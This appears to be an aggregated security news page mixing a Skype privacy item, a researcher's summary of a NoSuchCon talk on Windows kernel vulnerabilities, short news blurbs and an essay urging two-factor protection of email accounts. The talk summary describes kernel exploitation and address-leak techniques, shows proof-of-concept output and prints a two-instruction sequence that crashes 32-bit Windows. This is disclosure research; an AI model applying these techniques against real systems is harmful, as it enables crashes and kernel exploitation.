Hacking & Security
If you have any expectations about the privacy of your Skype communications, you may want to reassess them. Microsoft appears to be peeking into Skype messages for security reasons, according to Ars Technica.
The owner of Skype regularly scans the contents of messages sent on the service for signs of fraud, but what's done with the information from those scans -- whether it's stored indefinitely or destroyed -- is unknown.
The first edition of the NoSuchCon security conference held in Paris ended just a few days ago. Before anything else, I would like to thank all of the organizers (proudly listed at nosuchcon.org) for making the event such a blast! Both the location, venue and speaker line-up were amazing, with lots of free beer and wealth of people to chat with. Overall, I am very happy to have shown up there and I will definitely make sure to attend the second edition of the conference.
Other than drinking, discussing 0-days and visiting Paris, I also had the pleasure to give a talk about the usual subject – Windows kernel security. The exact title of my presentation was “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions“, and touched on the subject of several different exploitation techniques, internal CPU related behavior and security vulnerabilities (all related to the Windows operating system) that I discovered during the course of last several weeks / months.
While the slide deck was made available to the attendees right at the beginning of my talk at nosuchcon.org/talks (great idea!), I’m reposting them here anyway, in case you haven’t had a chance to take a look yet. In fact, a majority of the talks were interesting and highly technical, so be sure to check the available material for all presentations ;-)
Slides: “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions” (3.3MB, PDF)
KiTrap0e advisory: “Abusing Windows NT #PF Trap Handler to Bugcheck and Leak Information”
I originally planned to address six separate topics, but due to time constraints I decided to skip some of them in favor of the other ones. A brief description of each technique and vulnerability follows below.
- “nt!memcpy (and the like) reverse copying order” – certain implementations of the memcpy, memmove, RtlCopyMemory and RtlMoveMemory found in the kernel and third-party drivers alike handle the “overlapping regions” corner case by reversing the copy process order from the intuitive left-to-right to right-to-left direction. By starting to write at the end of the destination memory region, the functions facilitate successful exploitation of certain buffer overflow vulnerabilities, by allowing a (relative) write-what-where condition to be provoked.
While the technique works best for a kernel ← user copy on 64-bit platforms, it can also be applied to a number of other scenarios. For more information, please refer to the “Memory Copy Functions in Local Windows Kernel Exploitation” article published last year in the Hack in the Box Magazine, Issue 009. The Proof of Concept source code of a vulnerable device driver and an exploit used during live demonstration can be found at memcpy_ioctl.zip (3.9kB, ZIP). Note that the code has only been confirmed to be suspectible to a stack cookie bypass when built with WDK 7600.16385.1 for Windows 7 (x64 Free Build), although it should generally work for any 64-bit target.
- “nt!memcmp double-fetch” – an interesting behavior found in the Windows 8 32-bit implementation of the nt!memcmp standard function, making it possible to fake matching regions when a user-mode pointer is passed as one of the function’s parameters. Due to lack of time, this was not covered at NSC; however, our SyScan’13 slides and paper explain the problem thoroughly.
- “PAGE_GUARD and kernel code execution flow” – a technique already described in the “Fun facts: Windows kernel and guard pages” and “A story of win32k!cCapString, or unicode strings gone bad.” blog posts.
- “SegSs, LDT_ENTRY.HighWord.Bits.Default_Big and IRETD” – due to how the “Big“ LDT entry flag in the SS: segment descriptor is handled by the IRETD instruction used for cross-privilege-level transfers in Windows, it is possible to have the CPU disclose the upper 16 bits of the current thread’s kernel stack pointer in 32-bit versions of Windows.
Proof of Concept source code: small_seg.zip (1kB, ZIP).
Example output: Z:\>smallseg.exe [+] High word of kernel stack address: 94070000 Z:\>smallseg.exe [+] High word of kernel stack address: 94010000 Z:\>smallseg.exe [+] High word of kernel stack address: 956b0000
- “Windows 32-bit Trap Handlers” – the lack of proper sanitization of the previous CPL inside several trap handlers used in 32-bit Windows can be leveraged to disclose addresses of several internal ntoskrnl.exe (or equivalent) symbols in the kernel address space, effectively defeating kernel ASLR (not that it matters much for this particular OS).
Proof of Concept source code: kitrap01.zip (1.3kB, ZIP) and kitrap0e_addr.zip (1.4kB, ZIP).
Example outputs: Z:\>kitrap01.exe [+] Kernel image base: 8320c000, size: 413000 [+] Iteration 3d000 / 413000 [+] nt!KiFastCallEntry address: 83249790 Z:\>kitrap0e.exe [+] Kernel image base: 8320c000, size: 413000 [+] Iteration 3d000 / 413000 [+] Leaked address: 8324984c [+] Leaked address: 83249887 [+] Iteration 41000 / 413000 [+] Leaked address: 8324d4ed [+] Iteration 412000 / 413000
- “Crashing Windows and leaking bits” – the primary focus area of the overall talk. As it turns out, the nt!KiTrap0e #PF trap handler trusts the KTRAP_FRAME.Ebp field to be a valid kernel-mode pointer when processing faults occuring at a specific, magic Eip values. Again, due to lack of proper KTRAP_FRAME.SegCs sanitization, it is possible to craft a frame with controlled Eip and the user-mode Ebp register, allowing a local attacker to crash the system via an invalid memory reference, or otherwise disclose the least significant bit of any byte in the kernel address space.The two instructions capable of crashing all 32-bit Windows NT-family systems as of today are as follows:
xor ebp, ebp jmp 0x8327d1b7
where 0x8327d1b7 is the nt!KiSystemServiceAccessTeb address.
Proof of Concept source code: kitrap0e_bsod.zip (0.5kB, ZIP), kitrap0e_leak_bits.zip (1.4kB, ZIP) and kitrap0e_addr_space.zip (1.5kB, ZIP). The programs unconditionally crash the operating system, allow disclosing specific bits of the kernel memory and scan the kernel address space layout, respectively.
ISC StormCast for Wednesday, May 22nd 2013 http://isc.sans.edu/podcastdetail.html?id=3323, (Wed, May 22nd)
I find it sad that in times when people are facing disaster, many have died, others missing, a ...(more)...
Having control over an email account can be a lot of power, even though most people would probably say they do not care if someone else is reading their private emails. But it’s not always about reading those private emails. Of course there have been quite a few attacks where secrets were revealed by snooping through emails of hacked accounts. The reasons vary from jealous spouses searching for proof of an assumed affair or as serious as corporate espionage in which certain parties are seeking essential information about a critical deal. Other attackers may use the compromised account to send social engineering messages to all contacts stored in the email account posing as the person whose account has been hacked.
Nowadays an email account is much more than just sending and receiving emails. Many free service providers like Microsoft or Google have various additional services attached to email accounts. Having access to these accounts means having access to such things as private photos that were uploaded to the account. There have been a few cases where attackers broke into email accounts and found sensitive pictures, like naked photos, and then blackmailed the owner of the account. While most people are smart enough not to upload such pictures, with the integrated cloud storage that is available with many services now there may be all kinds of files stored in those accounts, such as password files, license files, tax records, passport scans, company documents, and more.
The power of an email can be even larger than this, as its scope is much greater. Many online services use the email address as a user name. Therefore, knowing the email address and the email account password can give the attacker access to many different accounts besides the email provider as many services offer to reset a forgotten password through email, even if the user does not use the same password on different services. Controlling the email account means controlling the password reset emails of other services and therefore giving access to many different services regardless of what password it uses.
Every time there is a data breach and email and passwords are publicly posted, other attackers will take this information and start new attacks with it. The first thing they usually try is to check whether the same password also accesses the email account.
Of course, not all services are of interest to attackers. Losing control of your social media account may not be enjoyable—especially if you are a news agency—but it will not really hurt most people. For companies this might be a different story, as it could lead to brand damage if something happens to their accounts. Last year there was the widely publicized situation of Mat Honan, a Wired reporter whose Apple devices were wiped when hackers gained access to his iCloud account. This can be troublesome, but as a user you can help to avoid it by registering for the additional security measures provided.
Some services are of interest to attackers. Companies can allow goods and services to be ordered for instance, charging the on-file credit card or sending an invoice to the account owner. Financial services, auctions, and payment services are definitely high on the list of services that hackers would check. There are many services that you probably do not want to lose control over. With companies adding more and more features it is even more important to protect your email account. For example, Google announced recently the integration of Google Wallet into Gmail. This allows you to send money from your email account in the same way you attach a picture to an email. You can attach money to an email as well. Or an attacker might do it for you.
To ensure that such attacks will not happen, Google was one of the first service providers to introduce two-factor authentication to the masses. Other services, including Apple have followed and have started to integrate two-factor authentication or out-of-band authentication in the form of a code being sent to a previously registered mobile phone or one time password (OTP) generator applications. This is a good solution to secure your account beyond passwords. It is definitely better than just forcing the user to fill out security questions that can easily be guessed with public information.
Not proactively enrolling in additional authentication measures, if they are available, also might leave you vulnerable to rare attacks for which a password is not even required as there is always a chance of a glitch, like the one in Apple’s password reset function in 2013. While Apple acted quickly and fixed the issue, users who had enrolled in two-step verification were protected the entire time. There have also been some cases where an attacker could use a cross-site request forgery (CSRF) attack to hijack an active session and reconfigure your email account. For example, a long time ago there was a simple attack where a website could add a forwarding filter to your Gmail account, resulting in all emails being forwarded to an additional address. Of course Google fixed this issue quickly and increased account security even further. For example, now the user is warned with a UI message if any new filters have been added. Those attacks are harder to prevent for the user, as logging out of the account whenever it is not used is often not really practical advice.
You should use a strong password for your main email account that is unique and also different than the passwords you use for other services. Also keep yourself aware of new security features introduced by your email account.
Chrome 27 stable released http://googlechromereleases.blogspot.ca/ some security fixes, (Tue, May 21st)
Go on to the site to read the full article